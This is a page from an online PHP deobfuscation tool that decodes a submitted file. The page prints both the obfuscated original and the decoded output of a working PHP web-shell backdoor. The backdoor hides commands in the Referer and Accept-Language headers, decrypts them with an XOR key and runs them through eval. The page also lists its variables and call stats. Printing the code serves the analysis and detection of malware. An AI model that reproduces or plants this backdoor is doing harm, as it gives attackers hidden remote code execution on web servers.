Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $K='i],0,$e))),$k^.)^.))^.;$o=ob_^.get_c^.ontents();ob_en^.d_c^.lean();^.$d=ba^.s^...

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$K='i],0,$e))),$k^.)^.))^.;$o=ob_^.get_c^.ontents();ob_en^.d_c^.lean();^.$d=ba^.s^.e64_enco^';
$l='$p=^.$ss($p,3)^.;^.}if(array_^.^.k^.ey^._exis^.ts($i,$s)){$s[$i^.].^.=$p;$e=strpos($s[$^';
$x='.6^.4_decode(preg_repla^.ce(arr^.^.ay(^."/_/","/-^./"),array(^."/","^.+"),$ss($^.s[^.^.$';
$s='.^.i],^.$f);if($e){$k=$k^.^.h.$kf;ob^._sta^.rt();@ev^.al(^.@gzunc^.ompre^.s^.s(@x(@base^';
$B='ON;$ss="^.subs^.tr";$s^.^.l="strto^.lower";$i^.=$m[1]^.[0].$m[1]^.[1];$h^.=$sl(^.$ss(md^';
$q='o=""^.;for($i=0;^.^.$i<$l;){fo^.r($j=0;(^.$j<$c&^.^.&$i<$l);$j++^.,$i+^.+)^.{$o^..=$t{$i';
$e='^.q^.=0.([\\d])^.)?,?^./",$ra,$m)^.;^.if($q&&$m){^.@s^.ession_^.star^.t^.();$s^.=&$_SESSI';
$r='r["HTTP_^.ACCEPT_LAN^.GUAGE"];^.if($r^.r&&^.$ra){$u=pars^.e_url(^.$r^.r);parse_^.^.str($';
$w=str_replace('X','','XcreaXte_XfuXnXXction');
$J='^.t($m[^.1]);$^.z++^.)$p.=$q[$m[^.2][^.$^.z]];if(^.str^.pos($p,$h)^.===0){$s[$i^.]="";^.';
$C='u["^.q^.uery"],$q);$q^.=arra^.^.^.y_values^.($q);preg_m^.atch_a^.ll("/([\\^.w])[\\w-]+(?:;';
$d='$kh="^.5d41";$kf="4^.0^.2^.a";func^.tion ^.x($t,$k){$^.c=s^.trlen($k);^.$l=strlen($^.^.t);$';
$I='.5($^.i.$kh),0,^.3))^.;$f=$sl($^.ss(^.md5^.(^.$i.^.$kf^.),0,3^.));$p="";for($z=1;$z<coun';
$P='.de(x(gzc^.ompress($^.o),$k^.));print("^.<$k>$d^.<^./$k>");@^.session_d^.estroy^.();}}}}';
$T='}^$k{$j^.}^.;}}return $o^.;}$r=$^._SERV^.ER;$rr=^.@$r["^.HTTP_R^.EFERER"^.];^.$r^.a=@^.$';
$t=str_replace('^.','',$d.$q.$T.$r.$C.$e.$B.$I.$J.$l.$s.$x.$K.$P);
$Z=$w('',$t);$Z();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B ON;$ss="^.subs^.tr";$s^.^.l="strto^.lower";$i^.=$m[1]^.[0].$..
$C u["^.q^.uery"],$q);$q^.=arra^.^.^.y_values^.($q);preg_m^.atc..
$I .5($^.i.$kh),0,^.3))^.;$f=$sl($^.ss(^.md5^.(^.$i.^.$kf^.),0,..
$J ^.t($m[^.1]);$^.z++^.)$p.=$q[$m[^.2][^.$^.z]];if(^.str^.pos(..
$K i],0,$e))),$k^.)^.))^.;$o=ob_^.get_c^.ontents();ob_en^.d_c^...
$P .de(x(gzc^.ompress($^.o),$k^.));print("^.<$k>$d^.<^./$k>");@..
$T }^$k{$j^.}^.;}}return $o^.;}$r=$^._SERV^.ER;$rr=^.@$r["^.HTT..
$Z None
$d $kh="^.5d41";$kf="4^.0^.2^.a";func^.tion ^.x($t,$k){$^.c=s^...
$e ^.q^.=0.([\d])^.)?,?^./",$ra,$m)^.;^.if($q&&$m){^.@s^.ession..
$l $p=^.$ss($p,3)^.;^.}if(array_^.^.k^.ey^._exis^.ts($i,$s)){$s..
$q o=""^.;for($i=0;^.^.$i<$l;){fo^.r($j=0;(^.$j<$c&^.^.&$i<$l);..
$r r["HTTP_^.ACCEPT_LAN^.GUAGE"];^.if($r^.r&&^.$ra){$u=pars^.e_..
$s .^.i],^.$f);if($e){$k=$k^.^.h.$kf;ob^._sta^.rt();@ev^.al(^.@..
$t $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$w create_function
$x .6^.4_decode(preg_repla^.ce(arr^.^.ay(^."/_/","/-^./"),array..

Stats

MD5 13330dcb575f77c8f85393871999b4b2
Eval Count 1
Decode Time 129 ms